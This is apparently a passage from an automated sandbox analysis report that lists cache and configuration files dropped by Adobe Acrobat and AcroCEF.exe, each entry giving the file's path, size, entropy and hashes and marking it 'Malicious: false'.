SSDEEP: | 3:p/lEYeVqfzvNt/57Dek3JyL/lAllEqW3l/TjzzQ/t:p/lEzVqfzvPR3tyL/lAmd8/ |
MD5: | BD0E27B34437BD72E5920C2A9CF658CA |
SHA1: | 4F1B2FA2C9F6D1FD1D2E74598BA42E0D3708A7CF |
SHA-256: | 049FA502D689965CC82EA6ED9529C35509A43C32FFA63392DD99F61E52ACDA97 |
SHA-512: | 95CC3816F7BAEFD9020A92763F266E5D07E07AE967CF582A5CEB8DBB40FD7CFE501D4F4E0E45CBE4F14FE327A771EAA0FB7B52940B950754EF7FA877333D5F46 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.212365692964267 |
Encrypted: | false |
SSDEEP: | 6:iO4CGYyq2PcNwi2nKuAl9OmbnIFUtSCJyz1ZmwsCJylRkwOcNwi2nKuAl9OmbjLJ:7vzyvLZHAahFUt9JG/bJeR54ZHAaSJ |
MD5: | EA4AEC69D2B398C88836DA0438FBEDC2 |
SHA1: | B77E821B4FF82B25620411F01706324D81A1FE17 |
SHA-256: | 50CB671DFBBC4790CE361E3CF0093B8C180941FEF493BAA889A68FBECA0CDD59 |
SHA-512: | C570B0A5104FBEDB86D20655B0595845FB18A31011BC68527B7D3D4DC73F0BEEBB2EBCCEC00E910B239B4B8F1BAA8C188A3E9AB3CA9F252A9B8FBB9743143F66 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.212365692964267 |
Encrypted: | false |
SSDEEP: | 6:iO4CGYyq2PcNwi2nKuAl9OmbnIFUtSCJyz1ZmwsCJylRkwOcNwi2nKuAl9OmbjLJ:7vzyvLZHAahFUt9JG/bJeR54ZHAaSJ |
MD5: | EA4AEC69D2B398C88836DA0438FBEDC2 |
SHA1: | B77E821B4FF82B25620411F01706324D81A1FE17 |
SHA-256: | 50CB671DFBBC4790CE361E3CF0093B8C180941FEF493BAA889A68FBECA0CDD59 |
SHA-512: | C570B0A5104FBEDB86D20655B0595845FB18A31011BC68527B7D3D4DC73F0BEEBB2EBCCEC00E910B239B4B8F1BAA8C188A3E9AB3CA9F252A9B8FBB9743143F66 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.180689505255422 |
Encrypted: | false |
SSDEEP: | 6:iO4CGq2PcNwi2nKuAl9Ombzo2jMGIFUtSCsJZmwsCsDkwOcNwi2nKuAl9Ombzo23:7vGvLZHAa8uFUt9y/b+54ZHAa8RJ |
MD5: | AE7D5FA93E96931E05B1D2EF48E10DF6 |
SHA1: | BE807D280BAE52102E4E014FC3FCDB02E8F392DC |
SHA-256: | B1A19CE450885C46F2AA8655AEBF01C7CD9CEC0C2199336696CF330DDB84FE03 |
SHA-512: | 568EF54958ADB2FC0F38F9543613E9F64BE5802AA641ECF2487AFD248F8F835B68BE0ACB29F2929560D5377519FA641269865EF2B47B0511B9B1DFC20DA87E60 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.180689505255422 |
Encrypted: | false |
SSDEEP: | 6:iO4CGq2PcNwi2nKuAl9Ombzo2jMGIFUtSCsJZmwsCsDkwOcNwi2nKuAl9Ombzo23:7vGvLZHAa8uFUt9y/b+54ZHAa8RJ |
MD5: | AE7D5FA93E96931E05B1D2EF48E10DF6 |
SHA1: | BE807D280BAE52102E4E014FC3FCDB02E8F392DC |
SHA-256: | B1A19CE450885C46F2AA8655AEBF01C7CD9CEC0C2199336696CF330DDB84FE03 |
SHA-512: | 568EF54958ADB2FC0F38F9543613E9F64BE5802AA641ECF2487AFD248F8F835B68BE0ACB29F2929560D5377519FA641269865EF2B47B0511B9B1DFC20DA87E60 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF67969d.TMP (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\bfb04d15-75be-4e41-bc6e-27367e2e6f11.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.967961042110297 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqqQ2sBdOg2HbAcaq3QYiubSpDyP7E4T3y:Y2sRds7QbdMHf3QYhbSpDa7nby |
MD5: | BBE929761F7A6D2F7F2634F9452FF782 |
SHA1: | 596E70DC4274840E4C9975A1E7771923FCACFFAA |
SHA-256: | 5CE5E23AEB5701D2490972C98AA47B71716AB9A5A9A9A41B80549927BB97CEE6 |
SHA-512: | 9F7412DBDA4B3C80B8A15BA5653D608B368C95133A9EA78B55D9BC89A1127BDD65B998A0C543D804B58E67C6546525F7E60420D2C28A2760986E86E399AF3E4F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\d2c32fb4-9523-4a84-8872-511141d28101.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.2402317102725675 |
Encrypted: | false |
SSDEEP: | 96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPXjQP/:CwNw1GHqPySfkcigoO3h28ytPTQP/ |
MD5: | EF88D39D770167E473CFF3598820C8D3 |
SHA1: | 1F3D127805B5CA531E34490EC7A9ADF93707722D |
SHA-256: | F535648D3F8E3D8903DD01C151C9FD763507AE8D434943C326713610DD6C9533 |
SHA-512: | EA7047D113CFD69F686CBF7340B08583259253E472CC0EE705ABC9F27C548F312499B6EBC345A3FDD739405DBEBBC699ED3796F8F307CC992EFECDD618C7F0B5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.203057440377995 |
Encrypted: | false |
SSDEEP: | 6:iO4ChQq2PcNwi2nKuAl9OmbzNMxIFUtSCAZZmwsCezkwOcNwi2nKuAl9OmbzNMFd:7vWvLZHAa8jFUt9s/bG54ZHAa84J |
MD5: | B6C4AFADB88A7AA19673CF203C7FAF36 |
SHA1: | 47B4509ACA065BFA7324F065D732C5599E697436 |
SHA-256: | 6AB36BF4FE4A92771BE12896A8A7EE07DF89EBEBA0E256D40A15F7DF98E6988A |
SHA-512: | FDB84AF14237689F8734F35F0F5BC62EFAE3CA17955DE9538E1C3D6A1D331F4502433A89177355F41B46CF2BB4B8A0CE73D4B70FCD073DBF64AD3F0FBB0B2BCE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.203057440377995 |
Encrypted: | false |
SSDEEP: | 6:iO4ChQq2PcNwi2nKuAl9OmbzNMxIFUtSCAZZmwsCezkwOcNwi2nKuAl9OmbzNMFd:7vWvLZHAa8jFUt9s/bG54ZHAa84J |
MD5: | B6C4AFADB88A7AA19673CF203C7FAF36 |
SHA1: | 47B4509ACA065BFA7324F065D732C5599E697436 |
SHA-256: | 6AB36BF4FE4A92771BE12896A8A7EE07DF89EBEBA0E256D40A15F7DF98E6988A |
SHA-512: | FDB84AF14237689F8734F35F0F5BC62EFAE3CA17955DE9538E1C3D6A1D331F4502433A89177355F41B46CF2BB4B8A0CE73D4B70FCD073DBF64AD3F0FBB0B2BCE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438857396620921 |
Encrypted: | false |
SSDEEP: | 384:SeLci5GwiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:kcurVgazUpUTTGt |
MD5: | C9AF7D44CB63A65C9D95D1CF0D9638F7 |
SHA1: | BE22316E5E8CF3C5E767E456728A16A823BC5A6C |
SHA-256: | A3A56AD0EC4BA2EC28698040C9686CCB34E91B582B6F6CD93916EA957AD2AD25 |
SHA-512: | FB10C20C5A921EE176EBD9AF35C9822AABF90EF96BB21C128A83C1C810AAF035395D1130372FA08AA9BF95A8D07AFE3A1FA1B3F42FD7D38B4645CF5DF048CA28 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2165726333086693 |
Encrypted: | false |
SSDEEP: | 24:7+tTT06wKolnqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmfj:7MTgW4nqvmFTIF3XmHjBoGGR+jMz+Lhb |
MD5: | B48FD97245205945A5D776B979C5AAAB |
SHA1: | A4EF9706DA885AC6647AAA5041166BA0467FE457 |
SHA-256: | A670061253101FC1569EDDE01B2CD04C333781FFAE98BF45FD1FA01032218194 |
SHA-512: | D0977C2FFCCC636C9CB0F7403D3C72B412ACBAEF159CA51C0E60FA03CF28592AB8F37F6688143AB64E66D7FADC50816308A97211E730C6ED7785DE453E053F22 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7321365340992054 |
Encrypted: | false |
SSDEEP: | 3:kkFklbgeRltfllXlE/HT8k4FljNNX8RolJuRdxLlGB9lQRYwpDdt:kKjKeT8TNMa8RdWBwRd |
MD5: | FE38C987FF79D7DF64289EB48B5064C2 |
SHA1: | 881E35C7436CBB2CC8C3719ABDC893F513944089 |
SHA-256: | 7715423D8D2853110F95E0A34FDE54757D85A129D2808B9D14356CB8E551A61C |
SHA-512: | 1AF80C3C8B1463E82556E963786692DD50F92C3E8E93EF8361A5DC113640DFDA324936E3B180E9C77233524AC38643628212C12B17F870FF245AC9292C4AA348 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.2429904267830576 |
Encrypted: | false |
SSDEEP: | 6:kKp+DL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:RqiDImsLNkPlE99SNxAhUe/3 |
MD5: | 96FABAB7625CBC640CA97D582001F92A |
SHA1: | 2D7B0F033A103993984713A18AF8E50B712AB0E1 |
SHA-256: | 991F18E2F25B33DB4682F05B9F040F494619857EFC0BAC66770A88B88D838B9F |
SHA-512: | DF36661B31E516A4C9C869B3344A65C38AFCE857F7C32F574178E664C9527B102EA207D5758D664E09448B850C327A80BF533DBB377CACD74E50509DAAD74BF1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.38985309429189 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJM3g98kUwPeUkwRe9:YvXKXyF7sdTeOOcGMbLUkee9 |
MD5: | 05B028632CC1D22966526BAC8977438B |
SHA1: | E6D8465750F9CC56407DDC39144AC9938DF06A25 |
SHA-256: | B39B5DF53EAF4C003CF0A6E9A03986F72DC8D39C2B12C317A44D0BBABAD9EF18 |
SHA-512: | 7ED91DD6582922A77929672A2C45AF80056569C5C6A8BEB622F87FF940B138B9DE5C6EC26BC8BA669715CAEF4E0BD5FE02DA2E9A7D4EB3E637C44864E394502B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.327993964493676 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJfBoTfXpnrPeUkwRe9:YvXKXyF7sdTeOOcGWTfXcUkee9 |
MD5: | AC3C3FD6CFB260B7C8E93D9BF8D4AE0D |
SHA1: | F37000712FE7E1142ED85626F8B38EBAA8231AB0 |
SHA-256: | 91F93E64F971D84BEF5DDD469EFFBD9846F202C381F8FA1DBB9809121DAC9389 |
SHA-512: | 4E7984EE8693D946150CBFA4E68071198467D703D2EF518C317C4FB54EE9D945E27699AE8E5072E06A4E66197087B621AF6C8490F56B29ADAECD07E88A76F4C0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.306393283362107 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJfBD2G6UpnrPeUkwRe9:YvXKXyF7sdTeOOcGR22cUkee9 |
MD5: | 52C83474C2664AC0B592B1BA7B517D83 |
SHA1: | 68E67B8E99B4F80D4D3813509534A91D4D402E98 |
SHA-256: | 17854D18AE16E7BD4BF3681813A806E3342B2476F5C1D8AC44B414BF2EB8BCBF |
SHA-512: | BEF5C4D6C74E2A16F466B62827D35BF8ECF8270972D3DD78CE8C3550AAA5FA0A6F189B73818525A6B1CA0245CF54578EF08FDB605335FC50812B242FE9051C3E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.377660860884415 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJfPmwrPeUkwRe9:YvXKXyF7sdTeOOcGH56Ukee9 |
MD5: | 6CE5FB4A2732CA97A99DA365F065452D |
SHA1: | 4A5AAFE0537C5D0A777FAB1F60F6599AF7C78573 |
SHA-256: | 02700C55546F362EF2D7A36FDD674DFAA31700C1B920C556EE00A030444EE10F |
SHA-512: | B6BC0527838D92426400596C8D9EE23F6EF3CE1ACC3745582F982288BEE3A5F19D392E0E5F43AA6562C97F618A83741B81B251DD5859E4050EFA7AC556C03E37 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.690986629021345 |
Encrypted: | false |
SSDEEP: | 24:Yv6XC7meOOZpLgE9cQx8LennAvzBvkn0RCmK8czOCCSN:YvOeLhgy6SAFv5Ah8cv/N |
MD5: | 184C6E1B1E0112CC109E3C65574A770A |
SHA1: | 78585DEE7A7ECAD3F8D1A59F104E2FD51DC575CF |
SHA-256: | 3C18B660F389015C6BE62A9175218B727BF64393C47157EF44BBA63FD0EDD2DE |
SHA-512: | 1A4953242AB2C9934DF21956F8B066E5966D808D214F56CBA844C5032234D1FB8847B325DE895EAF803F740B8BADBB03B5EB468E98A99C4C02A73B752BD02600 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.313583364255161 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJf8dPeUkwRe9:YvXKXyF7sdTeOOcGU8Ukee9 |
MD5: | CC6BB65D8FC27E22E3ECC2BF2C168F56 |
SHA1: | 510DED6159D49C00C7F44E6B85DE5F0AD3421A53 |
SHA-256: | F5621BBBBD05B3D0777531EB043D5B53A4842567C52A50649BF2DB5A3D0D4DFD |
SHA-512: | 62C1D92746FDDBF13C4D9ECC9A9C18D3D1F4F4A91660B4FB026B4D5B26EA50EC0E2A3A045FEB7EB5F5EC8E4ADCCF148480199324653B0075A35127422B4E4EBA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.317944241544113 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJfQ1rPeUkwRe9:YvXKXyF7sdTeOOcGY16Ukee9 |
MD5: | 15F1CAC4FD6512171323BAD68885E272 |
SHA1: | C5AF3A23BEA9796FC6BA90A036E17CECFB695850 |
SHA-256: | 7A5B2D71640030253106DA5CD367AB878A63A1BEB58BCEE205C2A0209440E1AE |
SHA-512: | B907B581F2811AFC8A2C24DA0C9F8D9D83D8D4B627223DF01DCE2D4CD59C2D6DA1FED0D9D4AED3AE911E4841B15D56966BA774D68930205FF486D893E2B0C2CC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3309930401243255 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJfFldPeUkwRe9:YvXKXyF7sdTeOOcGz8Ukee9 |
MD5: | FA0949819799C05A02A30F52568AE8E4 |
SHA1: | 59F5E10F6644A0A0C72BC11A144A8430D3CC95E2 |
SHA-256: | 55F1EC96C775ECB264ED6D433277F8882C646D53DE121E5F7940C06792E95E36 |
SHA-512: | 7B23CB913D35EA212B22B9E335217C725A5924B46E35F3B6595DA2682E60DD0956A15A47824381ABB726F83B95738D979FA5E343D451E0CC9C8D32033A556AC2 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.339542977329422 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJfzdPeUkwRe9:YvXKXyF7sdTeOOcGb8Ukee9 |
MD5: | 3E27C907C17DD06D2EEBC7272AFA04B3 |
SHA1: | 6FAB796DB1C4FEFD075E7983326A8D68508E50F8 |
SHA-256: | 7B1F0DADBD79EA1A086120A7FC7EF6FE233C9979F97F1A3BDC28AA6BF6455977 |
SHA-512: | C03C83780CC0D66147C687FA40C672032336C5937826DF58B45F4E60E1CFC77E9EFD01065DE4D9825068EF7A0CC039D61F57AB24CB37D910AD75CA45BB58A8FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3206056686791126 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX23rJWnWsGiIPEeOF0YcrToAvJfYdPeUkwRe9:YvXKXyF7sdTeOOcGg8Ukee9 |
MD5: | 412FE2FEA33E97C71BFB255AE65146E4 |
SHA1: | 52E0C6622402B2DE4B729448A51B83E73A6C50A3 |
SHA-256: | FCAB610CCC45B69E5E49A79ECABF2FCDDE52458DFEE52FCA334416A5C69E9302 |
